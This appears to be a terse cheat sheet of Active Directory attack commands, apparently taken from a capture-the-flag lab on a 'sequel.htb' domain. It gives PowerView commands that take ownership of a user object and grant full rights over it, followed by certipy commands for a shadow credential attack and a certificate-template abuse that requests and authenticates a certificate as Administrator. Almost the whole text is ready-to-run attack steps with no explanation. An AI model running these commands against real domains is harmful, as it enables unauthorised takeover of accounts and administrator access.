write-owner
powershell -ep bypass; Import-Module .\PowerView.ps1Set-DomainObjectOwner -Identity 'targetUser' -OwnerIdentity 'YouOwnthe-Username'Add-DomainObjectAcl -Rights 'All' -TargetIdentity "targetUser" -PrincipalIdentity "YouOwntheUser" Get-DomainUser | Where-Object { $_.Name -like "*YouOwntheUser*" } | Select-Object Name, ObjectsidGet-DomainObjectAcl -Identity 'targetUser' | Where-Object { $_.ActiveDirectoryRights -eq 'GenericAll' }Shadow Credential attack
certipy shadow auto -u username@domain -p pass -account ca_svc -dc-ip 10.10.10.51certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerablecertipy req -u ca_svc@domain -hashes :hash -ca CertificateAuthorityName -template VulnerableTemplate -upn Administrator@sequel.htbcertipy auth -pfx administrator.pfx -username Administrator -domain sequel.htbLast updated